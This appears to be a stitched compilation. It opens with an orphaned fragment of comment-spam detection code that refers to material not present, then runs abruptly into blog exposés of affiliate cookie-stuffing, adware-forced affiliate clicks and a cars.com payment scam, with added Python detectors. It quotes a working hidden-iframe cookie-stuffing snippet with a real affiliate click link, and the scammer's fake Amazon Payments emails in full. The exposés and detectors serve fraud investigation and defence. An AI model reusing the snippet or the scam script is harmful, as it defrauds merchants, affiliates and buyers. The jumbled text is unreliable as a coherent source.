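URL_RE = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}(?:/\S*)?", re.IGNORECASE)


def outbound_links(comment):
    """Links in a comment; backslashes are treated as slashes first."""
    return [m.group(0) for m in URL_RE.finditer(comment.replace("\\", "/"))]


def normalize(comment):
    """Collapse everything a spammer can cheaply vary: case, punctuation,
    whitespace, digits and the link itself."""
    text = URL_RE.sub(" <url> ", comment.replace("\\", "/").lower())
    text = re.sub(r"\d+", "0", text)
    text = re.sub(r"[^a-z0<>\s]", " ", text)
    return " ".join(text.split())


def fingerprint(comment):
    return hashlib.sha256(normalize(comment).encode()).hexdigest()


def resolve(link):
    return SHORTENER_MAP.get(re.sub(r"^https?://", "", link), link)


def host_of(url):
    return urlsplit(url if "://" in url else "http://" + url).hostname


def cpl_links(comment):
    """Outbound links that land on a known CPL tracker, with the affiliate id
    taken from the last path segment of the landing URL."""
    hits = []
    for link in outbound_links(comment):
        landing = resolve(link)
        if host_of(landing) in CPL_TRACKING_HOSTS:
            affiliate = urlsplit(landing).path.rstrip("/").rsplit("/", 1)[-1]
            hits.append({"link": link, "lands_on": host_of(landing), "affiliate": affiliate})
    return hits


def is_tainted(comment, blocked_fingerprints):
    """Block at the front door: a known (normalized) comment or a CPL link."""
    return fingerprint(comment) in blocked_fingerprints or bool(cpl_links(comment))


def tainted_fraction(videos, blocked_fingerprints):
    """T / N from the Scope section: share of videos with a tainted comment."""
    tainted = sum(1 for comments in videos
                  if any(is_tainted(c, blocked_fingerprints) for c in comments))
    return tainted / len(videos)


# Constructed front page: 40 videos, 9 of which carry one spam variant.
FRONT_PAGE = [[BENIGN, SPAM_B if (i % 4 == 0 and i < 36) else BENIGN] for i in range(40)]

if __name__ == "__main__":
    print(normalize(SPAM_A))
    print(cpl_links(SPAM_B))
    print(tainted_fraction(FRONT_PAGE, {fingerprint(SPAM_A)}))
```

The fingerprint catches re-posts of a comment the community has already flagged, including the rewrites the skeptic predicts; the link resolution catches new comments the fingerprint has never seen, because the affiliate id at the end of the chain is what the spammer cannot change without losing his payout.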

If you are a Linkshare affiliate competing for the same traffic as today’s rogue affiliate, know that you do not stand a chance. The reason for this is because Linkshare affiliate ‘smaqEgQUEvQ’ is unfairly using Cookie-Stuffing techniques to maximize his affiliate revenue.

Let’s look at how the scam is put together.

When visiting this page on wirelesscouponcode.com, casual inspection yields nothing out of the ordinary.

[image: affiliate fraud]

Open up the HTML source behind this page and scroll to line 279; note the hidden iframe (with a 1×1 width/height and CSS display set to none) pointing to a Linkshare affiliate click link:

<iframe 
 src="http://click.linksynergy.com/fs-bin/click?id=smaqEgQUEvQ&offerid=222015.10000603&subid=0&type=4" 
 WIDTH=1 HEIGHT=1 FRAMEBORDER=1  style="display:none">
</iframe>

This HTML invisibly loads the affiliate click link and, in turn, the merchant it routes through to (resulting in the applicable cookies being pushed onto the user’s machine), in this case att.com. I dynamically modified the page to show the att.com page that was hidden; follow the red arrow below.

[image: wirelesscouponcode_affiliate_fraud_1]

As is unfortunately the case with Cookie-Stuffing, the merchant will pay an unearned commission to the rogue affiliate should the user make a purchase within a predefined amount of time. So the merchant will lose and honest affiliates lose as well (for their cookies may have been overwritten).

Can’t reproduce this for yourself? This packet trace confirms the behavior in question.

I give this fraudster a 1/10.

  • 1 point for basic Cookie-Stuffing

Upon casual inspection, bestpcantivirus.com reviews antivirus solutions for your PC. In their own words:

We recommend you the best antivirus software for your PC. Our reviews and recommendations are balanced from the performance, budget and easy to use. Below are the Top 3 Antivirus programs that will give you the best performance and are Worth The Value You Pay For!

[image: affiliate fraud]

There’s a little more to this site than meets the eye. When you visit each of the pages for the products reviewed, bestpcantivirus.com invisibly forces affiliate cookies associated with the product in question onto your machine. The idea is that if you end up buying one of these products further down the road, Bestpcantivirus will be paid a commission, because they claim to be the entity responsible for the purchase. This is fine if you clicked through on the appropriate affiliate click links, but that’s not what happens here, i.e., Bestpcantivirus is playing the game unfairly. If you are an affiliate competing for the same traffic then you are going to lose.

Line 43 in the HTML source of this bestpcantivirus page has an IMG tag whose src attribute is set to a link that redirects through to an affiliate click link (CJ affiliate id 5727502) and then on to Norton.

affiliate_fraud_norton_3

Bestpcantivirus knows what they are doing is wrong, so they set the width and height attributes of this malformed image to 1×1; this way you won’t see it if you are just browsing casually. I dynamically modified the DOM to alter the dimensions of this image to 50×50; the red arrow highlights what is really going on:

affiliate fraud

As always, if you can’t reproduce this for yourself, this packet trace confirms the activity.

I give this scammer a 2/10:

  • 1 point for the most basic form of Cookie-Stuffing
  • 1 point for Cookie-Stuffing multiple merchants:

    Merchant        CJ Affiliate Id
    AVG             5727502
    Eset            3840211
    F-Secure        3840211
    Kaspersky       5727502
    Pandasecurity   5727502
    Zonealarm       3840211
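The hidden 1×1 image and the display:none IFRAME are the detectable signature of this kind of Cookie-Stuffing, and they can be picked up from the page source before any cookie is set. The following Python scanner is an added example for this post (not code from the original article or from any of the sites it names): it parses a page’s HTML and flags hidden `<img>`/`<iframe>` elements that load off-site or parameterised URLs, rating a direct hit on an affiliate-network click-link host higher than a first-party redirect that still has to be resolved. The sample page, the hostnames and the list of CJ click-link hosts are the example’s own assumptions; the publisher id 5727502 is the one reported above, the offer id is made up.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Click-link hosts of the affiliate network being monitored. The CJ hosts listed
# here are the example's own assumption; keep the set current for your networks.
AFFILIATE_HOSTS = {"anrdoezrs.net", "dpbolvw.net", "jdoqocy.com", "kqzyfj.com", "tkqlhce.com"}

_HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _px(value):
    """Leading integer of a width/height attribute ('1', '1px', ' 0 '), or None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def _is_hidden(attrs):
    """1x1/0x0 dimensions, the HTML5 hidden attribute, or display:none / visibility:hidden."""
    style = attrs.get("style") or ""
    if "hidden" in attrs or _HIDDEN_STYLE.search(style):
        return True
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    if w is None or h is None:  # fall back to CSS width/height inside the style attribute
        wm = re.search(r"width\s*:\s*(\d+)", style, re.I)
        hm = re.search(r"height\s*:\s*(\d+)", style, re.I)
        w = int(wm.group(1)) if wm else w
        h = int(hm.group(1)) if hm else h
    return w is not None and h is not None and w <= 1 and h <= 1


class HiddenLoadScanner(HTMLParser):
    """Collects img/iframe elements that are hidden yet load a URL worth questioning."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("img", "iframe"):
            return
        a = {k.lower(): v for k, v in attrs}
        src = a.get("src") or ""
        parsed = urlparse(src)
        host = (parsed.hostname or "").lower()
        off_site = bool(host) and host != self.page_host
        # A relative, query-less src (spacer gifs and the like) is ordinary page furniture.
        if not src or (not off_site and not parsed.query) or not _is_hidden(a):
            return
        known = any(host == n or host.endswith("." + n) for n in AFFILIATE_HOSTS)
        self.findings.append({
            "line": self.getpos()[0],
            "tag": tag,
            "src": src,
            "host": host,
            # A direct hit on a network host is conclusive; anything else is a redirect
            # candidate to resolve (fetch it with redirects disabled) before judging.
            "severity": "affiliate-network" if known else "review-redirect",
        })


def scan_html(html, page_host):
    """Return the list of hidden, questionable loads found in `html` served from `page_host`."""
    scanner = HiddenLoadScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page modelled on the pattern described above (not the real site's HTML).
SAMPLE_HTML = """<html><body>
<h1>Top 3 Antivirus</h1>
<img src="/img/spacer.gif" width="1" height="1">
<img src="http://reviews.example/go/product1?ref=review" width="1" height="1">
<iframe src="http://www.jdoqocy.com/click-5727502-0000000" style="display:none"></iframe>
<img src="http://cdn.example/logo.png" width="200" height="60">
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML, "bestpcantivirus.example"):
        print(f"line {f['line']}: hidden <{f['tag']}> -> {f['src']} [{f['severity']}]")
```

On the sample the spacer gif and the visible logo are ignored, the 1×1 image pointing at a parameterised off-site URL is reported for review, and the display:none IFRAME loading a CJ click link is reported outright. Static scanning only sees what is in the markup, so a redirect that starts on the reviewer’s own domain still needs to be followed (without auto-redirects) to confirm where it lands.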

Recall that the Bargain Hunter scam is a four-pronged attack:

1. Scammer Sets the Trap

This cars.com ad has a 2002 Toyota Tacoma PreRunner up for grabs at $5,582.

cars.com scam through amazon payments

It’s a pretty good deal, designed to whet my appetite and get me in touch with the seller thinking there’s a great deal to be had; in other words, it’s the entry point to a Bargain Hunter scam.

2. Victim Takes the Bait

First response from the seller:

From: Jessica Hale (jessica.hale2011@gmail.com)
Subject: Cars.com used car lead for Juanna - 2002 Toyota Tacoma

I still have my  2002 Toyota Tacoma Double Cab SR-5 TRD Pre-runner 
with 3.4 V-6, automatic transmission.Used 128k miles ,VIN# 
5tegn92n72z012744 .

I will take only $5500 total price shipping included from Medford OR,
i have my own trailer to have the truck delivered to you.It has a 
clear title ready to be signed and notarized on your name.

Runs great,no problems at all,garage kept only.  I can offer a 7 days 
inspection.

More pics attached here:

http://s1151.photobucket.com/albums/o629/sammy23r23/

The Photobucket link shows pictures of the car that are not available in the original cars.com ad (so this must be legit, right?)

3. Scammer Gains Victim’s Trust

It stands to reason that nobody in their right mind would engage in a financial transaction involving a large sum of money, someone they have never met and a car they have never seen. More so when the first act of good faith must come from the buyer, i.e., send the money first and then you will receive the goods.

Ah, but what about an entity that I trust? I do transactions of this nature every day with Amazon, right? So of course I will send money to them and then wait for delivery, if for no other reason than that they always deliver no matter what. It doesn’t take much to see how scammers will exploit this.

Email correspondence eventually received from the scammer when asking about how the transaction will take place:

From: Jessica Hale (jessica.hale2011@gmail.com)
Subject: Cars.com used car lead for Juanna - 2002 Toyota Tacoma

I have a contract with Amazon Payments so we can go through 
their Protection Program.

According with  the Amazon you have 7 days after you receive 
the car to inspect it and decide if you want to BUY IT or NOT.

Here is how it will work:

 1.First of all I will need  the following details from you:
 - Full Name
 - Full Address

 2. After I will receive the details from you, I will forward 
 them to Amazon.

 3. After they will process your info, they will send us both 
 invoices. You will receive the invoice with the details on 
 how to make a refundable payment to Amazon.They will hold 
 your payment while you test and inspect the vehicle at your
 home for a week.

 4. Amazon will contact me to ship the car to you. After you 
 receive the car you will have 7 days to test, verify and do 
 whatever you need to the car.  If you will decide to buy the 
 car, then I will get  the money from Amazon.

 5. If you will decide that you do not buy the car,  Amazon 
 will refund your payment same day.

I look forward to hearing from you . 

Thank you

Upon accepting these terms, I quickly got an email from someone claiming to be Amazon.

cars.com and amazon payment fraud

The Amazon email actually comes from a Live account: Amazon FPS (support.fps@live.com).

4. Victim Sends Money

Once I send the money through Money Gram, it’s gone. I won’t hear from the seller again and the car will never arrive. I could get in touch with Amazon, but they won’t know what I’m talking about (obviously, because they were never involved).

I give this scammer 1/10:

- 1 point for a very basic Bargain Hunter scam

As is usually the case, the scammer could have done a lot more here to improve the scam. He didn’t screen calls, he didn’t sample responses, and he did not go the extra mile when I asked for additional photos of the rear view mirror (saying that his kids broke his camera). Like most of the drivel out there, he is a bottom of the barrel scammer.

It is sad to think that sooner or later the scammer behind this ad is going to catch another victim; he wouldn’t be doing this otherwise.

Co-authored with Ben Edelman

On a computer running Perion Incredibar adware, our crawler browses the cafepress.co.uk site.  Incredibar sees this traffic and invisibly invokes the CJ click link with publisher ID 7164280, which redirects back to Cafepress.

Because the toolbar drops CJ cookies invisibly, there is nothing for us to show in a screenshot.  But the network trace confirms what occurred and confirms that the affiliate link was invoked invisibly.  Specifically, notice the creation of an invisible IFRAME called tbm_stat (CSS style of display:none, hence invisible).  Loaded inside that IFRAME is stat_mn.inc.php which creates another invisible IFRAME called tbmi_stat, again CSS display:none.  Within this doubly-invisible IFRAME, the redirect flow sends traffic onwards to the CJ click link — confirming that the cookie-drop occurs completely invisibly.

If a user subsequently makes a purchase, CJ and Cafepress records will credit affiliate 7164280 with purportedly causing that purchase.  But in fact the user was already at the Cafepress site before the Incredibar adware and this affiliate 7164280 intervened.  They did nothing to cause or encourage the user’s purchase, and any payments to this affiliate are entirely wasted.

Meanwhile, Incredibar’s advertising fraud is also notable in that Incredibar is made by Perion, a publicly-traded company (NASDAQ: PERI).  We see no obvious mechanism whereby Perion could diffuse blame or responsibility to any third party.  Investors would no doubt be surprised to learn that Perion’s revenue sources include affiliate fraud.

Co-authored with Ben Edelman

On a computer running Perion Incredibar adware, our crawler browses the Webroot site.  Incredibar sees this traffic and invisibly invokes the CJ click link with publisher ID 7164280, which redirects back to Webroot.

Because the toolbar drops CJ cookies invisibly, there is nothing for us to show in a screenshot.  But the network trace confirms what occurred and confirms that the affiliate link was invoked invisibly.  Specifically, notice the creation of an invisible IFRAME called tbm_stat (CSS style of display:none, hence invisible).  Loaded inside that IFRAME is stat_mn.inc.php which creates another invisible IFRAME called tbmi_stat, again CSS display:none.  Within this doubly-invisible IFRAME, the redirect flow sends traffic onwards to the CJ click link — confirming that the cookie-drop occurs completely invisibly.

If a user subsequently makes a purchase, CJ and Webroot records will credit affiliate 7164280 with purportedly causing that purchase.  But in fact the user was already at the Webroot site before the Incredibar adware and this affiliate 7164280 intervened.  They did nothing to cause or encourage the user’s purchase, and any payments to this affiliate are entirely wasted.

It is particularly striking to see Webroot, a company specializing in computer security, tricked by Incredibar adware — software that Webroot security software removes from users’ computers.

Meanwhile, Incredibar’s advertising fraud is also notable in that Incredibar is made by Perion, a publicly-traded company (NASDAQ: PERI).  We see no obvious mechanism whereby Perion could diffuse blame or responsibility to any third party.  Investors would no doubt be surprised to learn that Perion’s revenue sources include affiliate fraud.

Co-authored with Ben Edelman

On a computer running Zango adware, our crawler browses the oldnavy.gap.com site.  Zango sees this traffic and opens a window to surveysclick.com (packet trace).  Surveysclick.com returns tricky redirects and eventually does a POST through to a CJ click link with publisher ID 7115795, then on to Gap.  As shown in the screenshot, the user ends up with two Gap windows — the underlying window where the user had begun, and a second window opened by Zango adware.

affiliate fraud

If a user subsequently makes a purchase from either window, then CJ and Gap records will credit affiliate 7115795 with purportedly causing that purchase.  But in fact the user was already at the Gap site before the Zango adware and this affiliate 7115795 intervened.  They did nothing to cause or encourage the user’s purchase, and in fact they affirmatively interfered with the purchase by interrupting the user with a popup.  Any payments to this affiliate are entirely wasted.
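The network-trace reasoning used in the Incredibar and Zango write-ups above (the user was already on the merchant site before the affiliate click link fired, so the affiliate caused nothing) can be turned into an automated check over a captured trace. The following Python is an added example, not the authors’ own tooling: it walks the redirect hops from each affiliate click link to the merchant it lands on and flags any click that was preceded by an earlier visit to that merchant. The two traces, the merchant and intermediary hostnames, the offer ids and the CJ host list are constructed assumptions; the publisher id 7115795 is the one from the Zango post.

```python
import re
from urllib.parse import urlparse

# Affiliate-network click-link hosts (the CJ ones here are the example's own
# assumption; maintain the set for the networks your programme uses).
AFFILIATE_HOSTS = {"anrdoezrs.net", "dpbolvw.net", "jdoqocy.com", "kqzyfj.com", "tkqlhce.com"}


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _site(host):
    """Registrable-domain approximation: last two labels (www.gap.com -> gap.com).
    Adequate for the sample; a public-suffix list is needed for co.uk and friends."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def _is_affiliate_click(url):
    h = _host(url)
    return any(h == a or h.endswith("." + a) for a in AFFILIATE_HOSTS)


def _follow_redirects(trace, start):
    """Walk 3xx Location hops from trace[start]; return the final landing URL."""
    idx, hops = start, 0
    while 300 <= trace[idx]["status"] < 400 and trace[idx]["location"] and hops < 20:
        target = trace[idx]["location"]
        nxt = next((j for j in range(idx + 1, len(trace)) if trace[j]["url"] == target), None)
        if nxt is None:
            return target  # the hop was not captured; the Location header is all we know
        idx, hops = nxt, hops + 1
    return trace[idx]["url"]


def find_forced_affiliate_clicks(trace):
    """Flag affiliate click links that fired after the user had already reached the merchant.

    Each trace entry is {"t": seconds, "url": str, "status": int, "location": str|None}.
    """
    trace = sorted(trace, key=lambda r: r["t"])
    findings = []
    for i, req in enumerate(trace):
        if not _is_affiliate_click(req["url"]):
            continue
        m = re.search(r"click-(\d+)-", urlparse(req["url"]).path)  # CJ-style click-PID-OFFER path
        publisher = m.group(1) if m else None
        merchant = _site(_host(_follow_redirects(trace, i)))
        earlier = [p for p in trace[:i] if _site(_host(p["url"])) == merchant]
        if earlier:  # the merchant was visited before this affiliate "referral"
            findings.append({
                "publisher": publisher,
                "click_url": req["url"],
                "merchant": merchant,
                "merchant_first_seen": earlier[0]["t"],
                "click_at": req["t"],
                "seconds_after_arrival": round(req["t"] - earlier[0]["t"], 3),
            })
    return findings


# Constructed trace: the user is already shopping, then adware opens an intermediary
# page that redirects through a click link back to the same merchant.
SAMPLE_TRACE = [
    {"t": 0.0, "url": "http://www.merchant.example/", "status": 200, "location": None},
    {"t": 0.4, "url": "http://www.merchant.example/products/jeans", "status": 200, "location": None},
    {"t": 2.1, "url": "http://surveys.example/offer?x=1", "status": 302,
     "location": "http://www.jdoqocy.com/click-7115795-0000000"},
    {"t": 2.2, "url": "http://www.jdoqocy.com/click-7115795-0000000", "status": 302,
     "location": "http://www.merchant.example/?aff=constructed"},
    {"t": 2.3, "url": "http://www.merchant.example/?aff=constructed", "status": 200, "location": None},
]

# Constructed trace of an honest referral: review site first, click, then the merchant.
LEGIT_TRACE = [
    {"t": 0.0, "url": "http://reviews.example/best-jeans", "status": 200, "location": None},
    {"t": 5.0, "url": "http://www.jdoqocy.com/click-1234567-0000000", "status": 302,
     "location": "http://www.merchant.example/?aff=constructed"},
    {"t": 5.1, "url": "http://www.merchant.example/?aff=constructed", "status": 200, "location": None},
]

if __name__ == "__main__":
    for f in find_forced_affiliate_clicks(SAMPLE_TRACE):
        print(f"publisher {f['publisher']} fired {f['seconds_after_arrival']}s after the user "
              f"was already on {f['merchant']}: {f['click_url']}")
    print("honest referral findings:", find_forced_affiliate_clicks(LEGIT_TRACE))
```

The same check works on a merchant’s own server logs or on an affiliate network’s click data once sessions are keyed per user: a click whose landing session already contains merchant page views is a self-referral candidate, and the delay between arrival and click (a couple of seconds in the Zango case) separates adware injection from a genuine return visit via an affiliate link.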